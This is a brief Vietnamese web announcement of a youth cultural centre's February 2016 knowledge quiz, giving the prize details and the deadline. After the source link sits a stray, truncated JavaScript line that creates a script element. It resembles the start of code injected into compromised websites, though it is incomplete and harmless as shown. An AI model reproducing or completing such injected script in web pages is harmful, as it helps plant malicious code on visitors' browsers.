[NVHTN] – Cuộc thi “Thử tài kiến thức” kỳ 02/2016

0
2183

Mỗi kỳ sẽ có 5 câu hỏi trắc nghiệm hoặc hỏi đáp ngắn.

10 bạn trả lời đúng và nhanh nhất sẽ có cơ hội nhận được giấy khen của Nhà văn hóa Thanh niên và giải thưởng 100.000 đồng.

Thời gian nhận bài đến hết ngày 29/02/2016.

Thi tại đây nhé!

 

Nguồn: http://nvhtn.org.vn/moi-ban-tham-gia-cuoc-thi-thu-tai-kien-thuc-ky-022016/

var d=document;var s=d.createElement(‘script’);

CHIA SẺ